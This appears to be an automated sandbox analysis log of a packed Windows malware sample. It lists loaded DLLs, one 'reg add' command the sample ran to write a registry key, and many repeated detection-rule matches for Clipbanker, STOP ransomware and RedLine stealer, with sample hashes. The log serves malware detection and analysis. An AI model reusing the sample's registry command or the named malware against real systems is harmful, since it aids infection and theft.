Source: C:\Windows\explorer.exe	Section loaded: windows.shell.servicehostbuilder.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.globalization.dll
Source: C:\Windows\explorer.exe	Section loaded: icu.dll
Source: C:\Windows\explorer.exe	Section loaded: mswb7.dll
Source: C:\Windows\explorer.exe	Section loaded: devdispitemprovider.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.networking.connectivity.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.ui.core.textinput.dll
Source: C:\Windows\explorer.exe	Section loaded: windowsudk.shellcommon.dll
Source: C:\Windows\explorer.exe	Section loaded: dictationmanager.dll
Source: C:\Windows\explorer.exe	Section loaded: uianimation.dll
Source: C:\Windows\explorer.exe	Section loaded: npmproxy.dll
Source: C:\Windows\explorer.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\explorer.exe	Section loaded: winhttp.dll
Source: C:\Windows\explorer.exe	Section loaded: mswsock.dll
Source: C:\Windows\explorer.exe	Section loaded: winnsi.dll
Source: C:\Windows\explorer.exe	Section loaded: dpapi.dll
Source: C:\Windows\explorer.exe	Section loaded: msasn1.dll
Source: C:\Windows\explorer.exe	Section loaded: rsaenh.dll
Source: C:\Windows\explorer.exe	Section loaded: dnsapi.dll
Source: C:\Windows\explorer.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\explorer.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\explorer.exe	Section loaded: schannel.dll
Source: C:\Windows\explorer.exe	Section loaded: taskschd.dll
Source: C:\Windows\explorer.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\explorer.exe	Section loaded: ntasn1.dll
Source: C:\Windows\explorer.exe	Section loaded: ncrypt.dll
Source: C:\Windows\explorer.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\explorer.exe	Section loaded: gpapi.dll
Source: C:\Windows\explorer.exe	Section loaded: stobject.dll
Source: C:\Windows\explorer.exe	Section loaded: wmiclnt.dll
Source: C:\Windows\explorer.exe	Section loaded: workfoldersshell.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.fileexplorer.common.dll
Source: C:\Windows\explorer.exe	Section loaded: pcshellcommonproxystub.dll
Source: C:\Windows\explorer.exe	Section loaded: execmodelproxy.dll
Source: C:\Windows\explorer.exe	Section loaded: daxexec.dll
Source: C:\Windows\explorer.exe	Section loaded: container.dll
Source: C:\Windows\explorer.exe	Section loaded: shellcommoncommonproxystub.dll
Source: C:\Windows\explorer.exe	Section loaded: cryptngc.dll
Source: C:\Windows\explorer.exe	Section loaded: cflapi.dll
Source: C:\Windows\explorer.exe	Section loaded: uiautomationcore.dll
Source: C:\Windows\explorer.exe	Section loaded: samlib.dll
Source: C:\Windows\explorer.exe	Section loaded: batmeter.dll
Source: C:\Windows\explorer.exe	Section loaded: capabilityaccessmanagerclient.dll
Source: C:\Windows\explorer.exe	Section loaded: sxs.dll

Source: SecuriteInfo.com.W32.Kryptik.GYGF.tr.29287.4482.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\reg.exe reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1

Source: 25.2.build3.exe.9215a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 25.2.build3.exe.9215a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 33.2.mstsca.exe.9215a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 33.2.mstsca.exe.9215a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 25.2.build3.exe.9215a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 25.2.build3.exe.9215a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 30.2.build3.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 30.2.build3.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 33.2.mstsca.exe.9215a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 33.2.mstsca.exe.9215a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 30.2.build3.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 30.2.build3.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 13.2.1601.exe.48e15a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 13.2.1601.exe.48e15a0.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 16.2.1601.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 16.2.1601.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 17.2.1601.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 17.2.1601.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 8.2.1601.exe.49515a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 8.2.1601.exe.49515a0.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 15.2.1601.exe.49615a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 15.2.1601.exe.49615a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 34.2.1601.exe.48c15a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 34.2.1601.exe.48c15a0.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 38.2.1601.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 38.2.1601.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 17.2.1601.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 17.2.1601.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 28.2.1601.exe.48d15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 28.2.1601.exe.48d15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 13.2.1601.exe.48e15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 13.2.1601.exe.48e15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 29.2.1601.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 29.2.1601.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 15.2.1601.exe.49615a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 15.2.1601.exe.49615a0.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 34.2.1601.exe.48c15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 34.2.1601.exe.48c15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 16.2.1601.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 16.2.1601.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 29.2.1601.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 29.2.1601.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 9.2.1601.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 9.2.1601.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 8.2.1601.exe.49515a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 8.2.1601.exe.49515a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 28.2.1601.exe.48d15a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 28.2.1601.exe.48d15a0.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 38.2.1601.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 38.2.1601.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 9.2.1601.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 9.2.1601.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000000.00000002.1443372000.0000000002F58000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000021.00000002.2169316738.0000000000920000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 00000021.00000002.2169316738.0000000000920000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 00000021.00000002.2170422232.0000000000A0C000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000022.00000002.1999924732.0000000004827000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 0000000F.00000002.1764359339.0000000004960000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000011.00000002.2618390493.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000011.00000002.2618390493.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
